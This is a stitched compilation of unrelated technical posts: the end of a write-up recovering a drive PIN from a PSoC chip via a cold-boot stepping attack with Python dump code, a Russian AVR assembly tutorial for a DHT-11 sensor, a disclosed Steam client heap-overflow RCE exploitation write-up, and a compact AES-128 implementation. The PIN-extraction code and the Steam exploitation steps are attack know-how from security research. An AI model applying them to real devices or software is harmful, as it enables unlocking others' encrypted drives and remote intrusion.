block 127 : 0x63BE    block 127 : 0x6355
block 128 : 0x82F5    block 128 : 0x828C
``````

So both the PIN and “bad PIN” counter seem to be stored in block 126.

### Dumping block 126

Block 126 should be about 125x64x18 = 144000µs after the start of the checksum. So make sure, I looked for checksum `0x47E2` in my full dump, and it looked more or less correct.

Then, after dumping lots of imprecise (because of timing) data, manually fixing the results and comparing flash values (by staring at them), I finally got the following bytes at delay 145527µs:

``````PIN          Flash content
1234567      2526272021222319141402
123456       2526272021221919141402
998877       2d2d2c2c23231914141402
0987654      242d2c2322212019141402
123456789    252627202122232c2d1902
``````

It is quite obvious that the PIN is stored directly in plaintext ! The values are not ASCII or raw values but probably reflect the readings from the capacitive keyboard.

Finally, I did some other tests to find where the “bad PIN” counter is, and found this :

``````Delay  CSUM
145996 56E5 (old: 56E2, val: 03)
146020 571B (old: 56E5, val: 36)
146045 5759 (old: 571B, val: 3E)
146061 57F2 (old: 5759, val: 99)
146083 58F1 (old: 57F2, val: FF) <<---- here
146100 58F2 (old: 58F1, val: 01)
``````

`0xFF` means “15 tries” and it gets decremented with each bad PIN entered.

### Recovering the PIN

Putting everything together, my ugly code for recovering the PIN is:

``````def dump_pin():
pin_map = {0x24: "0", 0x25: "1", 0x26: "2", 0x27:"3", 0x20: "4", 0x21: "5",
0x22: "6", 0x23: "7", 0x2c: "8", 0x2d: "9"}
last_csum = 0
pin_bytes = []
for delay in range(145495, 145719, 16):
csum = csum_at(delay, 1)
byte = (csum-last_csum)&0xFF
print "%05d %04x (%04x) => %02x" % (delay, csum, last_csum, byte)
pin_bytes.append(byte)
last_csum = csum
print "PIN: ",
for i in range(0, len(pin_bytes)):
if pin_bytes[i] in pin_map:
print pin_map[pin_bytes[i]],
print
``````

Which outputs:

``````\$ ./psoc.py
syncing:  KO  OK
Resetting PSoC:  KO  Resetting PSoC:  KO  Resetting PSoC:  OK
145495 53e2 (0000) => e2
145511 5407 (53e2) => 25
145527 542d (5407) => 26
145543 5454 (542d) => 27
145559 5474 (5454) => 20
145575 5495 (5474) => 21
145591 54b7 (5495) => 22
145607 54da (54b7) => 23
145623 5506 (54da) => 2c
145639 5506 (5506) => 00
145655 5533 (5506) => 2d
145671 554c (5533) => 19
145687 554e (554c) => 02
145703 554e (554e) => 00
PIN:  1 2 3 4 5 6 7 8 9
``````

Great success !

Note that the delay values I used are probably valid only on the specific PSoC I have.

## What’s next ?

So, to sum up on the PSoC side in the context of our Aigo HDD:

• we can read the SRAM even when it’s protected (by design)
• we can bypass the flash read protection by doing a cold-boot stepping attack and read the PIN directly

However, the attack is a bit painful to mount because of timing issues. We could improve it by:

• writing a tool to correctly decode the cold-boot attack output
• using a FPGA for more precise timings (or use Arduino hardware timers)
• trying another attack: “enter wrong PIN, reset and dump RAM”, hopefully the good PIN will be stored in RAM for comparison. However, it is not easily doable on Arduino, as it outputs 5V while the board runs on 3.3V.

One very cool thing to try would be to use voltage glitching to bypass the read protection. If it can be made to work, it would give us absolutely accurate reads of the flash, instead of having to rely on checksum readings with poor timings.

As the SROM probably reads the flash protection bits in the `ReadBlock` “syscall”, we can maybe do the same as in described on Dmitry Nedospasov’s blog, a reimplementation of Chris Gerlinsky’s attack presented at REcon Brussels 2017.

One other fun thing would also be to decap the chip and image it to dump the SROM, uncovering undocumented syscalls and maybe vulnerabilities ?

## Conclusion

To conclude, the drive’s security is broken, as it relies on a normal (not hardened) micro-controller to store the PIN… and I have not (yet) checked the data encryption part !

What should Aigo have done ? After reviewing a few encrypted HDD models, I did a presentation at SyScan in 2015 which highlights the challenges in designing a secure and usable encrypted external drive and gives a few options to do something better 🙂

Overall, I spent 2 week-ends and a few evenings, so probably around 40 hours from the very beginning (opening the drive) to the end (dumping the PIN), including writing those 2 blog posts. A very fun and interesting journey 😉

## Как программировать Arduino на ассемблере

Читаем данные с датчика температуры DHT-11 на «голом» железе Arduino Uno ATmega328p используя только ассемблер

Попробуем на простом примере рассмотреть, как можно “хакнуть” Arduino Uno и начать писать программы в машинных кодах, т.е. на ассемблере для микроконтроллера ATmega328p. На данном микроконтроллере собственно и собрана большая часть недорогих «классических» плат «duino». Данный код также будет работать на практически любой demo плате на ATmega328p и после небольших возможных доработок на любой плате Arduino на Atmel AVR микроконтроллере. В примере я постарался подойти так близко к железу, как это только возможно. Для лучшего понимания того, как работает микроконтроллер не будем использовать какие-либо готовые библиотеки, а уж тем более Arduino IDE. В качестве учебно-тренировочной задачи попробуем сделать самое простое что только возможно — правильно и полезно подергать одной ногой микроконтроллера, ну то есть будем читать данные из датчика температуры и влажности DHT-11.

Arduino очень клевая штука, но многое из того что происходит с микроконтроллером специально спрятано в дебрях библиотек и среды Arduino для того чтобы не пугать новичков. Поигравшись с мигающим светодиодом я захотел понять, как микроконтроллер собственно работает. Помимо утоления чисто познавательного зуда, знание того как работает микроконтроллер и стандартные средства общения микроконтроллера с внешним миром — это называется «периферия», дает преимущество при написании кода как для Arduino так и при написания кода на С/Assembler для микроконтроллеров а также помогает создавать более эффективные программы. Итак, будем делать все наиболее близко к железу, у нас есть: плата совместимая с Arduino Uno, датчик DHT-11, три провода, Atmel Studio и машинные коды.

Для начало подготовим нужное оборудование.

Писать код будем в Atmel Studio 7 — бесплатно скачивается с сайта производителя микроконтроллера — Atmel.

Весь код запускался на клоне Arduino Uno — у меня это DFRduino Uno от DFRobot, на контроллере ATmega328p работающем на частоте 16 MHz — отличная надежная плата. Каких-либо отличий от стандартного Uno в процессе эксплуатации я не заметил. Похожая чорная плата от DFBobot, только “Mega” отлетала у меня 2 года в качестве управляющего контроллера квадрокоптера — куда ее только не заносило — проблем не было.

Для просмотра сигналов длительностью в микросекунды (а это на минутку 1 миллионная доля секунды), я использовал штуку, которая называется “логический анализатор”. Конкретно, я использовал клон восьмиканального USBEE AX Pro. Как смотреть для отладки такие быстрые процессы без осциллографа или логического анализатора — на самом деле даже не знаю, ничего посоветовать не могу.

Прежде всего я подключил свой клон Uno — как я говорил у меня это DFRduino Uno к Atmel Studio 7 и решил попробовать помигать светодиодиком на ассемблере. Как подключить описанно много где, один из примеров по ссылке в конце. Код пишется прямо в студии, прошивать плату можно через USB порт используя привычные возможности загрузчика Arduino -через AVRDude. Можно шить и через внешний программатор, я пробовал на китайском USBASP, по факту у меня оба способа работали. В обоих случаях надо только правильно настроить прошивальщик AVRDude, пример моих настроек на картинке

Полная строка аргументов:
-C “C:\avrdude\avrdude.conf” -p atmega328p -c arduino -P COM7 115200 -U flash:w:”\$(ProjectDir)Debug\\$(TargetName).hex:i

В итоге, для простоты я остановился на прошивке через USB порт — это стандартный способ для Arduio. На моей UNO стоит чип ATmega 328P, его и надо указать при создании проекта. Нужно также выбрать порт к которому подключаем Arduino — на моем компьютере это был COM7.

Для того, чтобы просто помигать светодиодом никаких дополнительных подключений не нужно, будем использовать светодиод, размещенный на плате и подключенный к порту Arduino D13 — напомню, что это 5-ая ножка порта «PORTB» контроллера.

Подключаем плату через USB кабель к компьютеру, пишем код в студии, прошиваем прямо из студии. Основная проблема здесь собственно увидеть это мигание, поскольку контроллер фигачит на частоте 16 MHz и, если включать и выключать светодиод такой же частотой мы увидим тускло горящий светодиод и собственно все.

Для того чтобы увидеть, когда он светится и когда он потушен, мы зажжем светодиод и займем процессор какой-либо бесполезной работой на примерно 1 секунду. Саму задержку можно рассчитать вручную зная частоту — одна команда выполняется за 1 такт или используя специальный калькулятор по ссылки внизу. После установки задержки, код выполняющий примерно то же что делает классический «Blink» Arduino может выглядеть примерно так:

Но на самом деле так писать не очень хорошо, поскольку мы полностью похерили такие важные штуки как стек и вектор прерываний (о них — позже).

Ок, светодиодиком помигали, теперь для того чтобы практика работа с GPIO была более или менее осмысленной прочитаем значения с датчика DHT11 и сделаем это также целиком на ассемблере.

Для того чтобы прочитать данные из датчика нужно в правильной последовательность выставлять на рабочей линии датчика сигналы высокого и низкого уровня — собственно это и называется дергать ногой микроконтроллера. С одной стороны, ничего сложного, с другой стороны все какая-то осмысленная деятельность — меряем температуру и влажность — можно сказать сделали первый шаг к построению какой ни будь «Погодной станции» в будущем.

Забегая на один шаг вперед, хорошо бы понять, а что собственно с прочитанными данными будем делать? Ну хорошо прочитали мы значение датчика и установили значение переменной в памяти контроллера в 23 градуса по Цельсию, соответственно. Как посмотреть на эти цифры? Решение есть! Полученные данные я буду смотреть на большом компьютере выводя их через USART контроллера через виртуальный COM порт по USB кабелю прямо в терминальную программу типа PuTTY. Для того чтобы компьютер смог прочитать наши данные будем использовать преобразователь USB-TTL — такая штука которая и организует виртуальный COM порт в Windows.

Сама схема подключения может выглядеть примерно так:

Сигнальный вывод датчика подключен к ноге 2 (PIN2) порта PORTD контролера или (что то же самое) к выводу D2 Arduino. Он же через резистор 4.7 kOm “подтянут” на “плюс” питания. Плюс и минус датчика подключены — к соответствующим проводам питания. USB-TTL переходник подключен к выходу Tx USART порта Arduino, что значит PIN1 порта PORTD контроллера.

Разбираемся с датчиком и смотрим datasheet. Сам по себе датчик несложный, и использует всего один сигнальный провод, который надо подтянуть через резистор к +5V — это будет базовый «высокий» уровень на линии. Если линия свободна — т.е. ни контроллер, ни датчик ничего не передают, на линии как раз и будет базовый «высокий» уровень. Когда датчик или контроллер что-то передают, то они занимают линию — устанавливают на линии «низкий» уровень на какое-то время. Всего датчик передает 5 байт. Байты датчик передает по очереди, сначала показатели влажности, потом температуры, завершает все контрольной суммой, это выглядит как “HHTTXX”, в общем смотрим datasheet. Пять байт — это 40 бит и каждый бит при передаче кодируется специальным образом.

Для упрощения, будет считать, что «высокий» уровень на линии — это «единица», а «низкий» соответственно «ноль». Согласно datasheet для начала работы с датчиком надо положить контроллером сигнальную линию на землю, т.е. получить «ноль» на линии и сделать это на период не менее чем 20 милсек (миллисекунд), а потом резко отпустить линию. В ответ — датчик должен выдать на сигнальную линию свою посылку, из сигналов высокого и низкого уровня разной длительности, которые кодируют нужные нам 40 бит. И, согласно datasheet, если мы удачно прочитаем эту посылку контроллером, то мы сразу поймем что: а) датчик собственно ответил, б) передал данные по влажности и температуре, с) передал контрольную сумму. В конце передачи датчик отпускает линию. Ну и в datasheet написано, что датчик можно опрашивать не чаще чем раз в секунду.

Итак, что должен сделать микроконтроллер, согласно datasheet, чтобы датчик ему ответил — нужно прижать линию на 20 миллисекунд, отпустить и быстро смотреть, что на линии:

Датчик должен ответить — положить линию в ноль на 80 микросекунд (мксек), потом отпустить на те же 80 мксек — это можно считать подтверждением того, что датчик на линии живой и откликается:

После этого, сразу же, по падению с высокого уровня на нижний датчик начинает передавать 40 отдельных бит. Каждый бит кодируются специальной посылкой, которая состоит из двух интервалов. Сначала датчик занимает линию (кладет ее в ноль) на определенное время — своего рода первый «полубит». Потом датчик отпускает линию (линия подтягивается к единице) тоже на определенное время — это типа второй «полубит». Длительность этих интервалов — «полубитов» в микросекундах кодирует что собственно пытается передать датчик: бит “ноль” или бит “единица”.

Рассмотрим описание битовой посылки: первый «полубит» всегда низкого уровня и фиксированной длительности — около 50 мксек. Длительность второго «полубита» определят, что датчик собственно передает.

Для передачи нуля используется сигнал высокого уровня длительностью 26–28 мксек:

Для передачи единицы, длительность сигнала высокого увеличивается до 70 микросекунд:

Мы не будет точно высчитывать длительность каждого интервала, нам вполне достаточно понимания, что если длительность второго «полубита» меньше чем первого — то закодирован ноль, если длительность второго «полубита» больше — то закодирована единица. Всего у нас 40 бит, каждый бит кодируется двумя импульсами, всего нам надо значит прочитать 80 интервалов. После того как прочитали 80 интервалов будем сравнить их попарно, первый “полубит” со вторым.

Вроде все просто, что же требуется от микроконтроллера для того чтобы прочитать данные с датчика? Получается нужно значит дернуть ногой в ноль, а потом просто считать всю длинную посылку с датчика на той же ноге. По ходу, будем разбирать посылку на «полу-биты», определяя где передается бит ноль, где единица. Потом соберем получившиеся биты, в байты, которые и будут ожидаемыми данными о влажности и температуре.

Ок, мы начали писать код и для начала попробуем проверить, а работает ли вообще датчик, для этого мы просто положим линию на 20 милсек и посмотрим на линии, что из этого получится логическим анализатором.

Определения:

Как я уже писал сам датчик подключен на 2 ногу порта D. В Arduino Uno это цифровой выход D2 (смотрим для проверки Arduino Pinout).

Все делаем тупо: инициализировали порт на выход, выставили ноль, подождали 20 миллисекунд, освободили линию, переключили ногу в режим чтения и ждем появление сигналов на ноге.

Смотрим анализатором — а ответил ли датчик?

Да, ответ есть — вот те сигналы после нашего первого импульса в 20 милсек — это и есть ответ датчика. Для просмотра посылки я использовал китайский клон USBEE AX Pro который подключен к сигнальному проводу датчика.

Растянем масштаб так чтобы увидеть окончание нашего импульса в 20 милсек и лучше увидеть начало посылки от датчика — смотрим все как в datasheet — сначала датчик выставил низкий/высокий уровень по 80 мксек, потом начал передавать биты — а данном случае во втором «полубите» передается «0»

Значит датчик работает и данные нам прислал, теперь надо эти данные правильно прочитать. Поскольку задача у нас учебная, то и решать ее будем тупо в лоб. В момент ответа датчика, т.е. в момент перехода с высокого уровня в низкий, мы запустим цикл с счетчиком числа повторов нашего цикла. Внутри цикла, будем постоянно следить за уровнем сигнала на ноге. Итого, в цикле будем ждать, когда сигнал на ноге перейдет обратно на высокий уровень — тем самым определив длительность сигнала первого «полубита». Наш микроконтроллер работает на частоте 16 MHz и за период например в 50 микросекунд контроллер успеет выполнить около 800 инструкций. Когда на линии появится высокий уровень — то мы из цикла аккуратно выходим, а число повторов цикла, которые мы отсчитали с использованием счетчика — запоминаем в переменную.

После перехода сигнальной линии уже на высокий уровень мы делаем такую же операцию– считаем циклы, до момента когда датчик начнет передавать следующий бит и положит линию в низкий уровень. К счастью, нам не надо знать точный временной интервал наших импульсов, нам достаточно понимать, что один интервал больше другого. Понятно, что если датчик передает бит «ноль» то длительность второго «полубита» и соответственно число циклов, которые мы отсчитали будет меньше чем длительность первого «полубита». Если же датчик передал бит «единица», то число циклов которые мы насчитаем во время второго полубита будет больше чем в первым.

И для того что бы мы не висели вечно, если вдруг датчик не ответил или засбоил, сам цикл мы будем запускать на какой-то временной период, но который гарантированно больше самой длинной посылки, чтоб если датчик не ответил, то мы смогли выйти по тайм-ауту.

В данном случае показан пример для ситуации, когда у нас на линии был ноль, и мы считаем сколько раз мы в цикле мы считали состояние ноги контроллера, пока датчик не переключил линию в единицу.

Аналогичная подпрограмма используется для того, чтобы посчитать сколько циклов у нас должно прокрутиться, пока датчик из состояния ноль на линии переложил линию в состояние единицы.

Для расчета временных задержек мы будет использовать тот же подход, который мы использовали при мигании светодиодом — подберем параметры пустого цикла для формирования нужной паузы. Я использовал специальный калькулятор. При желании можно посчитать число рабочих инструкций и вручную.

Памяти в нашем контроллере довольно много — аж 2 (Два) килобайта, так что мы не будем жлобствовать с памятью, и тупо сохраним данные счетчиков относительно наших 80 ( 40 бит, 2 интервала на бит) интервалов в память.

Объявим переменную

`CYCLES: .byte 80 ; буфер для хранения числа циклов`

И сохраним все считанные циклы в память.

Теперь, для отладки, попробуем посмотреть насколько удачно посчиталось длительность интервалов и понять действительно ли мы считали данные из датчика. Понятно, что число отсчитанных циклов первого «полубита» должно быть примерно одинаково у всех битовых посылок, а вот число циклов при отсчете второго «полубита» будет или существенно меньше, или наоборот существенно больше.

Для того чтобы передавать данные в большой компьютер будем использовать USART контроллера, который через USB кабель будет передавать данные в программу — терминал, например PuTTY. Передаем опять же тупо в лоб — засовываем байт в нужный регистр управления USART-а и ждем, когда он передастся. Для удобства я также использовал пару подпрограмм, типа — передать несколько байт, начиная с адреса в Y, ну и перевести каретку в терминале для красоты.

Отправив в терминал число отсчётов для 80 интервалов, можно попробовать собрать собственно значащие биты. Делать будем как написано в учебнике, т.е. в datasheet — попарно сравним число циклов первого «полубита» с числом циклов второго. Если вторые пол-бита короче — значит это закодировать ноль, если длиннее — то единица. После сравнения биты накапливаем в аккумуляторе и сохраняем в память по-байтово начиная с адреса BITS.

Итак, здесь мы собрали в памяти начиная с метки BITS те пять байт, которые передал контроллер. Но работать с ними в таком формате не очень неудобно, поскольку в памяти это выглядит примерно, как:
34002100ХХ, где 34 — это влажность целая часть, 00 — данные после запятой влажности, 21 — температура, 00 — опять данные после запятой температуры, ХХ — контрольная сумма. А нам надо бы вывести в терминал красиво типа «Temperature = 21.00». Так что для удобства, растащим данные по отдельным переменным.

Определения

И сохраняем байты из BITS в нужные переменные

После этого преобразуем цифры в коды ASCII, чтобы данные можно было нормально прочитать в терминале, добавляем названия данных, ну там «температура» из флеша и шлем в COM порт в терминал.

Для того, чтобы это измерять температуру регулярно добавляем вечный цикл с задержкой порядка 1200 миллисекунд, поскольку datasheet DHT11 говорит, что не рекомендуется опрашивать датчик чаще чем 1 раз в секунду.

Основной цикл после этого выглядит примерно так:

Прошиваем, подключаем USB-TTL кабель (преобразователь)к компьютеру, запускаем терминал, выбираем правильный виртуальный COM порта и наслаждаемся нашим новым цифровым термометром. Для проверки можно погреть датчик в руке — у меня температура при этом растет, а влажность как ни странно уменьшается.

## Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

This blog post explains the story behind a bug which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.

The keen-eyed, security conscious PC gamers amongst you may have noticed that Valve released a new update to the Steam client in recent weeks.
This blog post aims to justify why we play games in the office explain the story behind the corresponding bug, which had existed in the Steam client for at least the last ten years, and until last July would have resulted in remote code execution (RCE) in all 15 million active clients.
Since July, when Valve (finally) compiled their code with modern exploit protections enabled, it would have simply caused a client crash, with RCE only possible in combination with a separate info-leak vulnerability.
Our vulnerability was reported to Valve on the 20th February 2018 and to their credit, was fixed in the beta branch less than 12 hours later. The fix was pushed to the stable branch on the 22nd March 2018.

## Overview

At its core, the vulnerability was a heap corruption within the Steam client library that could be remotely triggered, in an area of code that dealt with fragmented datagram reassembly from multiple received UDP packets.

The Steam client communicates using a custom protocol – the “Steam protocol” – which is delivered on top of UDP. There are two fields of particular interest in this protocol which are relevant to the vulnerability:

• Packet length
• Total reassembled datagram length

The bug was caused by the absence of a simple check to ensure that, for the first packet of a fragmented datagram, the specified packet length was less than or equal to the total datagram length. This seems like a simple oversight, given that the check was present for all subsequent packets carrying fragments of the datagram.

Without additional info-leaking bugs, heap corruptions on modern operating systems are notoriously difficult to control to the point of granting remote code execution. In this case, however, thanks to Steam’s custom memory allocator and (until last July) no ASLR on the steamclient.dll binary, this bug could have been used as the basis for a highly reliable exploit.

What follows is a technical write-up of the vulnerability and its subsequent exploitation, to the point where code execution is achieved.

## Vulnerability Details

### PREREQUISITE KNOWLEDGE

#### Protocol

The Steam protocol has been reverse engineered and well documented by others (e.g. https://imfreedom.org/wiki/Steam_Friends) from analysis of traffic generated by the Steam client. The protocol was initially documented in 2008 and has not changed significantly since then.

The protocol is implemented as a connection-orientated protocol over the top of a UDP datagram stream. The packet structure, as documented in the existing research linked above, is as follows:

Key points:

• packet_len describes the length of payload (for unfragmented datagrams, this is equal to data length)
• type describes the type of packet, which can take the following values:
• 0x2 Authenticating Challenge
• 0x4 Connection Accept
• 0x5 Connection Reset
• 0x6 Packet is a datagram fragment
• 0x7 Packet is a standalone datagram
• The source and destination fields are IDs assigned to correctly route packets from multiple connections within the steam client
• In the case of the packet being a datagram fragment:
• split_count refers to the number of fragments that the datagram has been split up into
• data_len refers to the total length of the reassembled datagram
• The initial handling of these UDP packets occurs in the CUDPConnection::UDPRecvPkt function within steamclient.dll

#### Encryption

The payload of the datagram packet is AES-256 encrypted, using a key negotiated between the client and server on a per-session basis. Key negotiation proceeds as follows:

• Client generates a 32-byte random AES key and RSA encrypts it with Valve’s public key before sending to the server.
• The server, in possession of the private key, can decrypt this value and accepts it as the AES-256 key to be used for the session
• Once the key is negotiated, all payloads sent as part of this session are encrypted using this key.

### VULNERABILITY

The vulnerability exists within the RecvFragment method of the CUDPConnection class. No symbols are present in the release version of the steamclient library, however a search through the strings present in the binary will reveal a reference to “CUDPConnection::RecvFragment” in the function of interest. This function is entered when the client receives a UDP packet containing a Steam datagram of type 0x6 (Datagram fragment).

1. The function starts by checking the connection state to ensure that it is in the “Connected” state.
2. The data_len field within the Steam datagram is then inspected to ensure it contains fewer than a seemingly arbitrary 0x20000060 bytes.
3. If this check is passed, it then checks to see if the connection is already collecting fragments for a particular datagram or whether this is the first packet in the stream.

Figure 1

4. If this is the first packet in the stream, the split_count field is then inspected to see how many packets this stream is expected to span
5. If the stream is split over more than one packet, the seq_no_of_first_pkt field is inspected to ensure that it matches the sequence number of the current packet, ensuring that this is indeed the first packet in the stream.
6. The data_len field is again checked against the arbitrary limit of 0x20000060 and also the split_count is validated to be less than 0x709bpackets.

Figure 2

7. If these assertions are true, a Boolean is set to indicate we are now collecting fragments and a check is made to ensure we do not already have a buffer allocated to store the fragments.

Figure 3

8. If the pointer to the fragment collection buffer is non-zero, the current fragment collection buffer is freed and a new buffer is allocated (see yellow box in Figure 4 below). This is where the bug manifests itself. As expected, a fragment collection buffer is allocated with a size of data_lenbytes. Assuming this succeeds (and the code makes no effort to check – minor bug), then the datagram payload is then copied into this buffer using memmove, trusting the field packet_len to be the number of bytes to copy. The key oversight by the developer is that no check is made that packet_len is less than or equal to data_len. This means that it is possible to supply a data_len smaller than packet_len and have up to 64kb of data (due to the 2-byte width of the packet_len field) copied to a very small buffer, resulting in an exploitable heap corruption.

Figure 4

## Exploitation

This section assumes an ASLR work-around is present, leading to the base address of steamclient.dll being known ahead of exploitation.

### SPOOFING PACKETS

In order for an attacker’s UDP packets to be accepted by the client, they must observe an outbound (client->server) datagram being sent in order to learn the client/server IDs of the connection along with the sequence number. The attacker must then spoof the UDP packet source/destination IPs and ports, along with the client/server IDs and increment the observed sequence number by one.

### MEMORY MANAGEMENT

For allocations larger than 1024 (0x400) bytes, the default system allocator is used. For allocations smaller or equal to 1024 bytes, Steam implements a custom allocator that works in the same way across all supported platforms. In-depth discussion of this custom allocator is beyond the scope of this blog, except for the following key points:

1. Large blocks of memory are requested from the system allocator that are then divided into fixed-size chunks used to service memory allocation requests from the steam client.
2. Allocations are sequential with no metadata separating the in-use chunks.
3. Each large block maintains its own freelist, implemented as a singly linked list.
4. The head of the freelist points to the first free chunk in a block, and the first 4-bytes of that chunk points to the next free chunk if one exists.

#### Allocation

When a block is allocated, the first free block is unlinked from the head of the freelist, and the first 4-bytes of this block corresponding to the next_free_block are copied into the freelist_head member variable within the allocator class.

#### Deallocation

When a block is freed, the freelist_head field is copied into the first 4 bytes of the block being freed (next_free_block), and the address of the block being freed is copied into the freelist_head member variable within the allocator class.

### ACHIEVING A WRITE-WHAT-WHERE PRIMITIVE

The buffer overflow occurs in the heap, and depending on the size of the packets used to cause the corruption, the allocation could be controlled by either the default Windows allocator (for allocations larger than 0x400 bytes) or the custom Steam allocator (for allocations smaller than 0x400 bytes). Given the lack of security features of the custom Steam allocator, I chose this as the simpler of the two to exploit.

Referring back to the section on memory management, it is known that the head of the freelist for blocks of a given size is stored as a member variable in the allocator class, and a pointer to the next free block in the list is stored as the first 4 bytes of each free block in the list.

The heap corruption allows us to overwrite the next_free_block pointer if there is a free block adjacent to the block that the overflow occurs in. Assuming that the heap can be groomed to ensure this is the case, the overwritten next_free_block pointer can be set to an address to write to, and then a future allocation will be written to this location.

### USING DATAGRAMS VS FRAGMENTS

The memory corruption bug occurs in the code responsible for processing datagram fragments (Type 6 packets). Once the corruption has occurred, the RecvFragment() function is in a state where it is expecting more fragments to arrive. However, if they do arrive, a check is made to ensure:

`fragment_size + num_bytes_already_received < sizeof(collection_buffer)`

This will obviously not be the case, as our first packet has already violated that assertion (the bug depends on the omission of this check) and an error condition will be raised. To avoid this, the CUDPConnection::RecvFragment() method must be avoided after memory corruption has occurred.

Thankfully, CUDPConnection::RecvDatagram() is still able to receive and process type 7 (Datagram) packets sent whilst RecvFragment() is out of action and can be used to trigger the write primitive.

### THE ENCRYPTION PROBLEM

Packets being received by both RecvDatagram() and RecvFragment() are expected to be encrypted. In the case of RecvDatagram(), the decryption happens almost immediately after the packet has been received. In the case of RecvFragment(), it happens after the last fragment of the session has been received.

This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

### ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

## Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/

## AES-128 Block Cipher

### Introduction

In January 1997, the National Institute of Standards and Technology (NIST) initiated a process to replace the Data Encryption Standard (DES) published in 1977. A draft criteria to evaluate potential algorithms was published, and members of the public were invited to provide feedback. The finalized criteria was published in September 1997 which outlined a minimum acceptable requirement for each submission.

4 years later in November 2001, Rijndael by Belgian Cryptographers Vincent Rijmen and Joan Daemen which we now refer to as the Advanced Encryption Standard (AES), was announced as the winner.

Since publication, implementations of AES have frequently been optimized for speed. Code which executes the quickest has traditionally taken priority over how much ROM it uses. Developers will use lookup tables to accelerate each step of the encryption process, thus compact implementations are rarely if ever sought after.

Our challenge here is to implement AES in the least amount of C and more specifically x86 assembly code. It will obviously result in a slow implementation, and will not be resistant to side-channel analysis, although the latter problem can likely be resolved using conditional move instructions (CMOVcc) if necessary.

### AES Parameters

There are three different set of parameters available, with the main difference related to key length. Our implementation will be AES-128 which fits perfectly onto a 32-bit architecture

.

Key Length
(Nk words)
Block Size
(Nb words)
Number of Rounds
(Nr)
AES-128 4 4 10
AES-192 6 4 12
AES-256 8 4 14

### Structure of AES

Two IF statements are introduced in order to perform the encryption in one loop. What isn’t included in the illustration below is ExpandRoundKey and AddRoundConstantwhich generate round keys.

The first layout here is what we normally see used when describing AES. The second introduces 2 conditional statements which makes the code more compact.

## Source in C

The optimizers built into C compilers can sometimes reveal more efficient ways to implement a piece of code. At the very least, they will show you alternative ways to write some code in assembly.

```#define R(v,n)(((v)>>(n))|((v)<<(32-(n))))
#define F(n)for(i=0;i<n;i++)
typedef unsigned char B;
typedef unsigned W;

// Multiplication over GF(2**8)
W M(W x){
W t=x&0x80808080;
return((x^t)*2)^((t>>7)*27);
}
// SubByte
B S(B x){
B i,y,c;
if(x){
for(c=i=0,y=1;--i;y=(!c&&y==x)?c=1:y,y^=M(y));
x=y;F(4)x^=y=(y<<1)|(y>>7);
}
return x^99;
}
void E(B *s){
W i,w,x[8],c=1,*k=(W*)&x[4];

// copy plain text + master key to x
F(8)x[i]=((W*)s)[i];

for(;;){
// 1st part of ExpandRoundKey, AddRoundKey and update state
w=k[3];F(4)w=(w&-256)|S(w),w=R(w,8),((W*)s)[i]=x[i]^k[i];

// 2nd part of ExpandRoundKey
w=R(w,8)^c;F(4)w=k[i]^=w;

// if round 11, stop else update c
if(c==108)break;c=M(c);

// SubBytes and ShiftRows
F(16)((B*)x)[(i%4)+(((i/4)-(i%4))%4)*4]=S(s[i]);

// if not round 10, MixColumns
if(c!=108)F(4)w=x[i],x[i]=R(w,8)^R(w,16)^R(w,24)^M(R(w,8)^w);
}
}
```

### x86 Overview

Some x86 registers have special purposes, and it’s important to know this when writing compact code.

Register Description Used by
eax Accumulator lods, stos, scas, xlat, mul, div
ebx Base xlat
ecx Count loop, rep (conditional suffixes E/Z and NE/NZ)
edx Data cdq, mul, div
esi Source Index lods, movs, cmps
edi Destination Index stos, movs, scas, cmps
ebp Base Pointer enter, leave

Those of you familiar with the x86 architecture will know certain instructions have dependencies or affect the state of other registers after execution. For example, LODSB will load a byte from memory pointer in SI to AL before incrementing SI by 1. STOSB will store a byte in AL to memory pointer in DI before incrementing DI by 1. MOVSB will move a byte from memory pointer in SI to memory pointer in DI, before adding 1 to both SI and DI. If the same instruction is preceded REP (for repeat) then this also affects the CX register, decreasing by 1.

### Initialization

The s parameter points to a 32-byte buffer containing a 16-byte plain text and 16-byte master key which is copied to the local buffer x.

A copy of the data is required, because both will be modified during the encryption process. ESI will point to swhile EDI will point to x

